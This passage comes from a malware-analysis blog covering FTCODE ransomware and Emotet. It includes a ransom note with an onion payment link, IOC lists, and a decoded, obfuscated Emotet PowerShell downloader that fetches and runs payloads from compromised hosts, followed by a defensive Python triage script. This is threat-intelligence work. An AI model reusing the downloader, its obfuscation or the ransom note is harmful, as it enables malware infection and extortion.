class="p">,</span><span class="ss">"*.bay"</span><span class="p">,</span><span class="ss">"*.sr2"</span><span class="p">,</span><span class="ss">"*.srf"</span><span class="p">,</span><span class="ss">"*.arw"</span><span class="p">,</span><span class="ss">"*.3fr"</span><span class="p">,</span><span class="ss">"*.dng"</span><span class="p">,</span><span class="ss">"*.jpe"</span><span class="p">,</span><span class="ss">"*.jpg"</span><span class="p">,</span><span class="ss">"*.cdr"</span><span class="p">,</span><span class="ss">"*.indd"</span><span class="p">,</span><span class="ss">"*.ai"</span><span class="p">,</span><span class="ss">"*.eps"</span><span class="p">,</span><span class="ss">"*.pdf"</span><span class="p">,</span><span class="ss">"*.pdd"</span><span class="p">,</span><span class="ss">"*.psd"</span><span class="p">,</span><span class="ss">"*.dbf"</span><span class="p">,</span><span class="ss">"*.mdf"</span><span class="p">,</span><span class="ss">"*.wb2"</span><span class="p">,</span><span class="ss">"*.rtf"</span><span class="p">,</span><span class="ss">"*.wpd"</span><span class="p">,</span><span class="ss">"*.dxg"</span><span class="p">,</span><span class="ss">"*.xf"</span><span class="p">,</span><span class="ss">"*.dwg"</span><span class="p">,</span><span class="ss">"*.pst"</span><span class="p">,</span><span class="ss">"*.accdb"</span><span class="p">,</span><span class="ss">"*.mdb"</span><span class="p">,</span><span class="ss">"*.pptm"</span><span class="p">,</span><span class="ss">"*.pptx"</span><span class="p">,</span><span class="ss">"*.ppt"</span><span class="p">,</span><span class="ss">"*.xlk"</span><span class="p">,</span><span class="ss">"*.xlsb"</span><span class="p">,</span><span class="ss">"*.xlsm"</span><span class="p">,</span><span class="ss">"*.xlsx"</span><span class="p">,</span><span class="ss">"*.xls"</span><span class="p">,</span><span class="ss">"*.wps"</span><span class="p">,</span><span class="ss">"*.docm"</span><span 
class="p">,</span><span class="ss">"*.docx"</span><span class="p">,</span><span class="ss">"*.doc"</span><span class="p">,</span><span class="ss">"*.odb"</span><span class="p">,</span><span class="ss">"*.odc"</span><span class="p">,</span><span class="ss">"*.odm"</span><span class="p">,</span><span class="ss">"*.odp"</span><span class="p">,</span><span class="ss">"*.ods"</span><span class="p">,</span><span class="ss">"*.odt"</span>
</pre></div>
<p></br></p>
<p>The ransom note, dropped as an HTML file with the filename <em>READ_ME_NOW.htm</em>:</p>
<div class="highlight"><pre><span></span><span class="o"><</span><span class="nv">h1</span><span class="o">></span><span class="nv">All</span> <span class="nv">your</span> <span class="nv">files</span> <span class="nv">was</span> <span class="nv">encrypted</span><span class="o">!</</span><span class="nv">h1</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">ID</span>: <span class="o"><</span><span class="nv">b</span><span class="o">></span>$<span class="nv">whyjfdxez</span><span class="o"></</span><span class="nv">b</span><span class="o">></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">Your</span> <span class="nv">personal</span> <span class="nv">KEY</span>: $<span class="nv">gdejthseee</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">1</span>. <span class="nv">Download</span> <span class="nv">Tor</span> <span class="nv">browser</span> <span class="o">-</span> <span class="o"><</span><span class="nv">a</span> <span class="nv">href</span><span class="o">=</span><span class="s1">'</span><span class="s">https://www.torproject.org/download/</span><span class="s1">'</span><span class="o">></span><span class="nv">https</span>:<span class="o">//</span><span class="nv">www</span>.<span class="nv">torproject</span>.<span class="nv">org</span><span class="o">/</span><span class="nv">download</span><span class="o">/</</span><span class="nv">a</span><span class="o">></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">2</span>. <span class="nv">Install</span> <span class="nv">Tor</span> <span class="nv">browser</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">3</span>. <span class="nv">Open</span> <span class="nv">Tor</span> <span class="nv">Browser</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">4</span>. <span class="nv">Open</span> <span class="nv">link</span> <span class="nv">in</span> <span class="nv">TOR</span> <span class="nv">browser</span>: <span class="o"><</span><span class="nv">b</span><span class="o">></span><span class="nv">http</span>:<span class="o">//</span><span class="nv">qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd</span>.<span class="nv">onion</span><span class="o">/</span>?<span class="nv">guid</span><span class="o">=</span>$<span class="nv">whyjfdxez</span><span class="o"></</span><span class="nv">b</span><span class="o">></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="mi">5</span>. <span class="nv">Follow</span> <span class="nv">the</span> <span class="nv">instructions</span> <span class="nv">on</span> <span class="nv">this</span> <span class="nv">page</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">h2</span><span class="o">>*****</span> <span class="nv">Warning</span><span class="o">*****</</span><span class="nv">h2</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="k">Do</span> <span class="nv">not</span> <span class="nv">rename</span> <span class="nv">files</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="k">Do</span> <span class="nv">not</span> <span class="nv">try</span> <span class="nv">to</span> <span class="nv">back</span> <span class="nv">your</span> <span class="nv">data</span> <span class="nv">using</span> <span class="nv">third</span><span class="o">-</span><span class="nv">party</span> <span class="nv">software</span>, <span class="nv">it</span> <span class="nv">may</span> <span class="nv">cause</span> <span class="nv">permanent</span> <span class="nv">data</span> <span class="nv">loss</span><span class="ss">(</span><span class="k">If</span> <span class="nv">you</span> <span class="k">do</span> <span class="nv">not</span> <span class="nv">believe</span> <span class="nv">us</span>, <span class="nv">and</span> <span class="nv">still</span> <span class="nv">try</span> <span class="nv">to</span> <span class="o">-</span> <span class="nv">make</span> <span class="nv">copies</span> <span class="nv">of</span> <span class="nv">all</span> <span class="nv">files</span> <span class="nv">so</span> <span class="nv">that</span> <span class="nv">we</span> <span class="nv">can</span> <span class="nv">help</span> <span class="nv">you</span> <span class="k">if</span> <span class="nv">third</span><span class="o">-</span><span class="nv">party</span> <span class="nv">software</span> <span class="nv">harms</span> <span class="nv">them</span><span class="ss">)</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">As</span> <span class="nv">evidence</span>, <span class="nv">we</span> <span class="nv">can</span> <span class="k">for</span> <span class="nv">free</span> <span class="nv">back</span> <span class="nv">one</span> <span class="nv">file</span><span class="o"></</span><span class="nv">p</span><span class="o">></span>
<span class="o"><</span><span class="nv">p</span><span class="o">></span><span class="nv">Decoders</span> <span class="nv">of</span> <span class="nv">other</span> <span class="nv">users</span> <span class="nv">is</span> <span class="nv">not</span> <span class="nv">suitable</span> <span class="nv">to</span> <span class="nv">back</span> <span class="nv">your</span> <span class="nv">files</span> <span class="o">-</span> <span class="nv">encryption</span> <span class="nv">key</span> <span class="nv">is</span> <span class="nv">created</span> <span class="nv">on</span> <span class="nv">your</span> <span class="nv">computer</span> <span class="nv">when</span> <span class="nv">the</span> <span class="nv">program</span> <span class="nv">is</span> <span class="nv">launched</span> <span class="o">-</span> <span class="nv">it</span> <span class="nv">is</span> <span class="nv">unique</span>.<span class="o"></</span><span class="nv">p</span><span class="o">></span>
</pre></div>
<p></br></p>
<p>Twitter user treetone alerted possible victims not to pay the ransom, since he did not receive a decryptor after paying it for a client. There are evidently conflicting reports about what happens after paying the ransom, as shown below.</p>
<p><center><blockquote class="twitter-tweet"><p lang="it" dir="ltr">Do not pay, I repeat, DO NOT PAY the ransom for the FTCODE ransomware that is arriving via PEC at Italian companies; you will not be given any private key or any decryption software. I just tried it for a client.</p>— treetone (@treetone2) <a href="https://twitter.com/treetone2/status/1179722767782072320?ref_src=twsrc%5Etfw">October 3, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p></br></p>
<p>As reported by BleepingComputer forum user Hidemik, paying the ransom redirects the victim to a page with instructions to run the following PowerShell script (I removed the Base64-encoded RSA key):</p>
<p><center><img alt="HTML Ransomnote" src="https://dissectingmalwa.re/img/gootkit-decryptor.png"></center></p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Gootkit (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">3</span><span class="n">e846a7316dbc15a38cfd522b14ad3f1a72d79959cbae9fd14621400d77cbc37</span>
</pre></div>
<h3>Malicious .docm (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="n">bf1fae0bca74eb3e788985734c750e33949e24f44f4c6e76c615aa70a80ea175</span>
</pre></div>
<h3>Related Files (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">93</span><span class="n">aef539b491ecd4f3e3bfad2b226e8026d3335e457f5d8ba903e1d76686633e</span> <span class="c1">--> feat-chewy-shipping-confirmation.jpg</span>
<span class="mi">3721</span><span class="n">af6150db2082e6f8342c450070b835a46311c2fade9e1cd5598727d7db4f</span> <span class="c1">--> index.js</span>
<span class="n">e6c58e32c151f2e9e44cd8bc98cdf12373a7f8fc40262e1c4402f2eb6d191d1e</span> <span class="c1">--> invoice_confirmation_534678238865.vbs</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">getpdfreader</span>.<span class="mi">13</span><span class="nv">stripesbrewery</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">pdf</span>.<span class="nv">php</span>?<span class="nv">MTo7Njc2NDk3</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">rejoiner</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">resources</span><span class="o">/</span><span class="nv">wp</span><span class="o">-</span><span class="nv">content</span><span class="o">/</span><span class="nv">uploads</span><span class="o">/</span><span class="mi">2017</span><span class="o">/</span><span class="mi">04</span><span class="o">/</span><span class="nv">feat</span><span class="o">-</span><span class="nv">chewy</span><span class="o">-</span><span class="nv">shipping</span><span class="o">-</span><span class="nv">confirmation</span>.<span class="nv">jpg</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">ont</span>.<span class="nv">carolinabeercompany</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">bolp</span>.<span class="nv">cab</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">wws</span>.<span class="nv">tkgventures</span>[.]<span class="nv">com</span><span class="o">/</span> <span class="ss">(</span><span class="nv">Source</span> <span class="nv">Port</span>: <span class="mi">49207</span><span class="o">/</span> <span class="mi">50769</span>, <span class="mi">194</span>.<span class="mi">76</span>.<span class="mi">224</span>[.]<span class="mi">108</span>:<span class="mi">80</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">z2g3mtkwotm4</span>[.]<span class="nv">top</span><span class="o">/</span> <span class="ss">(</span><span class="nv">Source</span> <span class="nv">Port</span>: <span class="mi">52742</span><span class="o">/</span> <span class="mi">52745</span>, <span class="mi">35</span>.<span class="mi">187</span>.<span class="mi">36</span>[.]<span class="mi">248</span>:<span class="mi">80</span><span class="ss">)</span>
<span class="nv">hxxps</span>:<span class="o">//</span><span class="nv">adp</span>.<span class="nv">reevesandcompany</span>[.]<span class="nv">com</span><span class="o">/</span><span class="nv">rbody320</span> <span class="ss">(</span><span class="mi">176</span>.<span class="mi">10</span>.<span class="mi">125</span>[.]<span class="mi">87</span>:<span class="mi">443</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">picturecrafting</span>[.]<span class="nv">site</span> <span class="ss">(</span><span class="mi">208</span>.<span class="mi">91</span>.<span class="mi">197</span>.<span class="mi">91</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">ogy5mtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">mjvjmtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">otnhmtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">zgzimtkwotm4</span>[.]<span class="nv">top</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">cofee</span>.<span class="nv">theshotboard</span>[.]<span class="nv">net</span><span class="o">/</span>?<span class="nv">need</span><span class="o">=</span><span class="nv">uuid</span><span class="o">&</span><span class="nv">vid</span><span class="o">=</span><span class="nv">dc1</span>:<span class="nv">loadjs</span><span class="o">&</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">aweb</span>.<span class="nv">theshotboard</span>[.]<span class="nv">info</span><span class="o">/</span>?<span class="nv">page</span><span class="o">=</span><span class="nv">xing</span><span class="o">&</span><span class="nv">vid</span><span class="o">=</span><span class="nv">dc1</span>:<span class="nv">load</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">aweb</span>.<span class="nv">theshotboard</span>[.]<span class="nv">info</span><span class="o">/</span><span class="nv">ver</span><span class="o">=</span><span class="mi">926</span>.<span class="mi">3</span><span class="o">&</span><span class="nv">guid</span><span class="o">=</span><span class="nv">VICTIM</span><span class="o">-</span><span class="nv">ID</span><span class="o">+</span><span class="nv">PASSWD</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">qvo5sd7p5yazwbrgioky7rdu4vslxrcaeruhjr7ztn3t2pihp56ewlqd</span>[.]<span class="nv">onion</span><span class="o">/</span>?<span class="nv">guid</span><span class="o">=</span><span class="nv">VICTIM</span><span class="o">-</span><span class="nv">ID</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">home</span>.<span class="nv">tith</span>[.]<span class="nv">in</span><span class="o">/</span><span class="nv">seven</span>.<span class="nv">sat</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="k">connect</span>.<span class="nv">simplebutmatters</span>[.]<span class="nv">com</span> <span class="ss">(</span><span class="mi">185</span>.<span class="mi">158</span>.<span class="mi">248</span>[.]<span class="mi">151</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">home</span>.<span class="nv">isdes</span>[.]<span class="nv">com</span> <span class="ss">(</span><span class="mi">31</span>.<span class="mi">214</span>.<span class="mi">157</span>[.]<span class="mi">3</span><span class="ss">)</span>
<span class="nv">hxxp</span>:<span class="o">//</span><span class="nv">home</span>.<span class="nv">southerntransitions</span>[.]<span class="nv">net</span> <span class="ss">(</span><span class="mi">31</span>.<span class="mi">214</span>.<span class="mi">157</span>[.]<span class="mi">3</span><span class="ss">)</span>
</pre></div>
<p></br></p>
<h2>Return of the Mummy - Welcome back, Emotet</h2>
<p>f0wL, 2019-09-24 (tag:dissectingmalwa.re,2019-09-24:/return-of-the-mummy-welcome-back-emotet.html)</p>
<p>Or, to be more historically precise: Imhotep was the Egyptian, Emotet is the malware strain we are going to take a look at. Last week it returned from its summer vacation with a few new tricks.</p><p></br></p>
<h4><em>A short disclaimer: downloading and running the samples linked below will compromise your computer and data, so be f$cking careful. Also check with your local laws as owning malware binaries/ sources might be illegal depending on where you live.</em></h4>
<p>Emotet Sample #1 @ <a href="https://www.hybrid-analysis.com/sample/6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5">Hybrid Analysis</a>
--> <code>sha256 6076e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5</code></p>
<p>Emotet Sample #2 @ <a href="https://www.hybrid-analysis.com/sample/757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975">Hybrid Analysis</a>
--> <code>sha256 757b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975</code></p>
<p></br></p>
<p><img alt="Emotet Word Image" src="https://dissectingmalwa.re/img/emotet-word1.png"></p>
<p></br></p>
<p>Emotet brought home a few souvenirs from its summer trip as well. The images above and below show the two most common decoy header pictures used by the distributed maldocs. The malicious VBA code is hidden underneath the picture in small text boxes that contain the embedded macro.</p>
<p></br></p>
<p><a href="https://app.any.run/tasks/4ecd561a-d376-4bf7-bf2c-3e8f4dccb6c2">AnyRun Analysis</a></p>
<p></br></p>
<p><img alt="Emotet Word2 Image" src="https://dissectingmalwa.re/img/emotet-word2.png"></p>
<p></br></p>
<p><center><blockquote class="twitter-tweet"><p lang="en" dir="ltr"><a href="https://twitter.com/hashtag/Emotet?src=hash&ref_src=twsrc%5Etfw">#Emotet</a> malspam campaign uses Snowden's new book as lure<a href="https://t.co/J2W6RvKWxC">https://t.co/J2W6RvKWxC</a> <a href="https://t.co/p9v5yox4sE">pic.twitter.com/p9v5yox4sE</a></p>— MB Threat Intel (@MBThreatIntel) <a href="https://twitter.com/MBThreatIntel/status/1176205270898229248?ref_src=twsrc%5Etfw">September 23, 2019</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></center></p>
<p>As researchers at Malwarebytes found out, the malspammers are even trying to lure people into downloading the infected Word documents by advertising them as Edward Snowden's new book "Permanent Record". Seems like the criminals have reached a new moral low point.</p>
<p></br></p>
<p>The following two screenshots are excerpts of the report generated by <a href="https://github.com/decalage2/oletools">OLETools</a> on an Emotet Word Document.</p>
<p><img alt="Emotet VBA Analysis 1" src="https://dissectingmalwa.re/img/emotet-vba2.png"></p>
<p></br></p>
<p><center><img alt="Emotet VBA Analysis 2" src="https://dissectingmalwa.re/img/emotet-vbatable.png"></center></p>
<p></br></p>
<p><img alt="Emotet Powershell Script" src="https://dissectingmalwa.re/img/emotet-powershell.png"></p>
<p></br></p>
<p>After decoding the Base64 String we get this command as a result:</p>
<div class="highlight"><pre><span></span>$<span class="nv">solidstatePPV76</span><span class="o">=</span><span class="s1">'</span><span class="s">RhodeIslandB832</span><span class="s1">'</span><span class="c1">;$turquoiseXDz48 = '844';$compressEq464='monitorcJX36';$PersistentWS41=$env:userprofile+'\'+$turquoiseXDz48+'exe';$SmallzLJ27='synergiesEa36';$TCPK2E89=('new-ob'+'je'+'ct') neTwEBClIenT;$customizediV75='hxxps://gcsucai[.]com/wp-content/h891u8f8/@hxxp://www.offmaxindia[.]com/wp-includes/b161/@hxxp://www.kutrialiogludernegi[.]com/cgi-bin/6j1/@hxxp://poshinternationalmedia[.]com/nqec/zcdvgy178/@hxxp://drfalamaki[.]com/Mqm24/btxz33664/'"S`plIt"('@');$Handmadeam16='depositwo79';foreach($invoicekq959 in $customizediV75){try{$TCPK2E89"dOwn`lO`A`DFilE"($invoicekq959, $PersistentWS41);$transmitaT74='transitioniK793';If ((&('Get-I'+'te'+'m') $PersistentWS41)"lenG`TH" -ge 23645) {[DiagnosticsProcess]::"St`ARt"($PersistentWS41);$BuckinghamshireYwZ18='ResearchPwz41';break;$CzechRepublicSBT52='Netherlands.Antilleslj3'}}catch{}}$AwesomeSteelChairtZ21='granularvi43'</span>
</pre></div>
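<p>The decoded command above is a typical Emotet downloader stage: a list of payload URLs joined with '@', PowerShell backtick escapes inside member names (S`plIt, dOwn`lO`A`DFilE) to break naive string matching, and a size check (-ge 23645) on the dropped file before it is started. The Python script below is an added example written for this post, not the author's tooling and not anything taken from Emotet; it takes the downloader as quoted on the page (URLs kept defanged, the throwaway variable assignments dropped) and re-packs it as a constructed <code>-EncodedCommand</code> blob so that it runs offline, then undoes the Base64/UTF-16LE packaging, strips the backtick obfuscation and pulls out the payload URLs, hostnames, size threshold and obfuscated member names an analyst would feed into blocklists or a detection.</p>

```python
import base64
import re

# Constructed sample: the de-obfuscated Emotet downloader quoted above, with the
# URLs left defanged (hxxp, [.]) and the throwaway variable assignments removed.
DECODED_COMMAND = (
    r"""$solidstatePPV76='RhodeIslandB832';$turquoiseXDz48 = '844';"""
    r"""$PersistentWS41=$env:userprofile+'\'+$turquoiseXDz48+'exe';"""
    r"""$TCPK2E89=('new-ob'+'je'+'ct') neTwEBClIenT;"""
    r"""$customizediV75='hxxps://gcsucai[.]com/wp-content/h891u8f8/@"""
    r"""hxxp://www.offmaxindia[.]com/wp-includes/b161/@"""
    r"""hxxp://www.kutrialiogludernegi[.]com/cgi-bin/6j1/@"""
    r"""hxxp://poshinternationalmedia[.]com/nqec/zcdvgy178/@"""
    r"""hxxp://drfalamaki[.]com/Mqm24/btxz33664/'"S`plIt"('@');"""
    r"""foreach($invoicekq959 in $customizediV75){try{"""
    r"""$TCPK2E89"dOwn`lO`A`DFilE"($invoicekq959, $PersistentWS41);"""
    r"""If ((&('Get-I'+'te'+'m') $PersistentWS41)"lenG`TH" -ge 23645) """
    r"""{[DiagnosticsProcess]::"St`ARt"($PersistentWS41);break}}catch{}}"""
)

# powershell -EncodedCommand expects Base64 over UTF-16LE text; the blob is
# built here (constructed) so the example needs no external input.
ENCODED_COMMAND = base64.b64encode(DECODED_COMMAND.encode("utf-16le")).decode("ascii")


def decode_encoded_command(blob: str) -> str:
    """Undo the -EncodedCommand packaging (Base64 -> UTF-16LE -> str)."""
    return base64.b64decode(blob).decode("utf-16le")


def strip_backticks(cmd: str) -> str:
    """PowerShell treats ` as an escape, so "dOwn`lO`A`DFilE" is "DownloadFile".
    Removing it restores the real member names before any matching."""
    return cmd.replace("`", "")


def extract_download_urls(cmd: str) -> list:
    """Return the '@'-separated payload URL list that Emotet calls .Split('@') on."""
    clean = strip_backticks(cmd)
    m = re.search(r"""'([^']+)'"split"\('@'\)""", clean, re.IGNORECASE)
    if not m:
        return []
    return [u for u in m.group(1).split("@") if u]


def extract_hosts(cmd: str) -> list:
    """Hostnames (still defanged) for blocklisting or retro-hunting in proxy logs."""
    return [re.sub(r"^hxxps?://", "", u).split("/")[0] for u in extract_download_urls(cmd)]


def extract_size_threshold(cmd: str):
    """Emotet only starts the download if it is at least N bytes long (-ge N)."""
    m = re.search(r"-ge\s+(\d+)", cmd)
    return int(m.group(1)) if m else None


def extract_obfuscated_members(cmd: str) -> list:
    """Member names that were split with backticks, normalised to lower case."""
    return [strip_backticks(n).lower() for n in re.findall(r'"([A-Za-z`]+)"', cmd)]


def triage(blob: str) -> dict:
    """One-shot summary of an encoded Emotet downloader."""
    cmd = decode_encoded_command(blob)
    return {
        "urls": extract_download_urls(cmd),
        "hosts": extract_hosts(cmd),
        "min_size": extract_size_threshold(cmd),
        "members": extract_obfuscated_members(cmd),
    }


if __name__ == "__main__":
    for key, value in triage(ENCODED_COMMAND).items():
        print(key, value)
```

<p>The backtick stripping is the important step: a detection that looks for the literal string <code>DownloadFile</code> never sees it in this sample, while one that normalises the escapes first does. The hosts are deliberately left in defanged form so the output can be pasted into a report without creating live links.</p>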
<p><center><img alt="Detect it easy" src="https://dissectingmalwa.re/img/emotet-die1.png"></center></p>
<p><center><img alt="ActCtx" src="https://dissectingmalwa.re/img/emotet-actctx.png"></center></p>
<p></br></p>
<p>Taking a peek at the imports we can see that the malware uses (amongst other functions) <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-terminateprocess">TerminateProcess</a>, <a href="https://docs.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent">IsDebuggerPresent</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/api/timezoneapi/nf-timezoneapi-gettimezoneinformation">GetTimeZoneInformation</a> imported from <em>Kernel32.dll</em>.</p>
<p><center><img alt="Reading Locale" src="https://dissectingmalwa.re/img/emotet-locale.png"></center></p>
<p></br></p>
<p>Furthermore it imports various functions like <a href="https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regdeletevaluew">RegDeleteValueW</a> from <em>Advapi32.dll</em> to modify the registry.</p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-import-reg.png"></center></p>
<p></br></p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-antidebug.png"></center></p>
<p>It uses the <em>IsDebuggerPresent</em> function from debugapi.h to check whether it is being debugged and exits if the call returns true.</p>
<p></br></p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-con1.png"></center></p>
<p></br></p>
<p><center><img alt="IDA Graph Anti-Debug" src="https://dissectingmalwa.re/img/emotet-payloads.png"></center></p>
<p><center><img alt="Detect it easy Sample 2" src="https://dissectingmalwa.re/img/emotet-die2.png"></center>
<center>The Any.Run Analysis of the second sample can be found <a href="https://app.any.run/tasks/77d2e95d-8059-4806-b815-b749428d5470/">here</a>.</center></p>
<p></br></p>
<p><center><img alt="Typography Expert" src="https://dissectingmalwa.re/img/emotet-comicsans.png"></center></p>
<p><center>Looks like we stumbled across a real typography expert as well.</center></p>
<p></br></p>
<p><center><img alt="Squirrel Shootout ?!" src="https://dissectingmalwa.re/img/emotet-squirrel.png"></center></p>
<p><center>Squirrel Shootout?! Sounds like another attempt to disguise the sample as a different executable.</center></p>
<p></br></p>
<p><center><img alt="Decryption Routine" src="https://dissectingmalwa.re/img/emotet-decrypt.png"></center>
<center>Interesting strings all around.</center></p>
<p>Another quite interesting tool for unpacking and analyzing Emotet is <a href="https://github.com/seth1002/tracecorn_tina">tracecorn_tina</a>, which is (as the name already suggests) based on <a href="https://github.com/icchy/tracecorn">tracecorn</a>, a Windows API tracer for malware.</p>
<p></br></p>
<h2><em>IOCs</em></h2>
<h3>Emotet (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="mi">6076</span><span class="n">e26a123aaff20c0529ab13b2c5f11259f481e43d62659b33517060bb63c5</span> <span class="p">(</span><span class="mi">480</span> <span class="n">KiB</span><span class="p">)</span>
<span class="mi">7080</span><span class="n">e1b236a19ed46ea28754916c43a7e8b68727c33cbf81b96077374f4dc205</span> <span class="p">(</span><span class="mi">484</span> <span class="n">KiB</span><span class="p">)</span>
<span class="mi">757</span><span class="n">b35d20f05b98f2c51fc7a9b6a57ccbbd428576563d3aff7e0c6b70d544975</span> <span class="p">(</span><span class="mi">201</span> <span class="n">KiB</span><span class="p">)</span>
</pre></div>
<h3>.docm Files (SHA256)</h3>
<div class="highlight"><pre><span></span><span class="n">ea7391b5dd01d2c79ebe16e842daacc84a0dc5f0174235bbae86b2204312a6ab</span> <span class="c1">--> 5B99674D2005BB01760A1765E4CB3BD06C6A7970.doc</span>
<span class="n">e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855</span> <span class="c1">--> 8KZLXW0QU5K8_NJC.docm</span>
<span class="n">c13a058b51294284b7383b5d5c78eff83529519c207376cf26e94f4e888c5114</span> <span class="c1">--> 9B797E5A9E5FB0789B8278134AF083AA4116B28E.doc</span>
<span class="n">ae63b306cc2787b2acac3770d706db0648f53e1fade14af0104cfcb07001e22d</span> <span class="c1">--> ANHANG 3311 1519749319.doc</span>
<span class="mi">82</span><span class="n">bb3612b299cba0350e1dc4c299af9d50354cc1448b1dd931017f4381d0606a</span> <span class="c1">--> D468EA5BA7A856C12C3AC887C1A023F6B1182165.doc</span>
<span class="mi">78</span><span class="n">d7b30a7a68c3b1da18bcf2ea84904907ecbd96d460b7d94871ac1a6ff21a35</span> <span class="c1">--> DETAILS_09_17_2019MW-33916.docm</span>
<span class="n">d88175cb5257df99953b2cfb65dff302dce425548c54706bf7d23ba6de5eef19</span> <span class="c1">--> DOC-16092019 6678523.doc</span>
<span class="n">cb4a203b541ec40e06c9d9f030dacf22747d62a771385d49d03801945b8d2e1a</span> <span class="c1">--> FB1ADE20382673E3E1D3351FA3155229880F6ECE.doc</span>
<span class="mi">1</span><span class="n">e1eedfe3066f398cdc0805ec5338e2028c0fd7085255c741d31ec35eb3bdbda</span> <span class="c1">--> 7330786_09_23_2019_UIE76589.doc</span>
</pre></div>
<h3>URLs</h3>
<div class="highlight"><pre><span></span><span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">autorepuestosdml</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">CiloXIptI</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">pep</span><span class="o">-</span><span class="n">egypt</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">eedy</span><span class="o">/</span><span class="n">xx3yspke7_l7jp5</span><span class="o">-</span><span class="mi">430067348</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">danangluxury</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">uploads</span><span class="o">/</span><span class="n">KTgQsblu</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">gcesb</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">includes</span><span class="o">/</span><span class="n">customize</span><span class="o">/</span><span class="n">zUfJervuM</span><span class="o">/</span>
<span class="n">hxxps</span><span class="p">:</span><span class="o">//</span><span class="n">bondagetrip</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">content</span><span class="o">/</span><span class="n">y0gm3xxs_hmnw8rq</span><span class="o">-</span><span class="mi">764161699</span><span class="o">/</span>
<span class="n">hxxp</span><span class="p">:</span><span class="o">//</span><span class="n">www</span><span class="p">.</span><span class="n">offmaxindia</span><span class="p">[.]</span><span class="n">com</span><span class="o">/</span><span class="n">wp</span><span class="o">-</span><span class="n">includes</span><span class="o">/</span><span class="n">b161</span><span class="o">/</span>
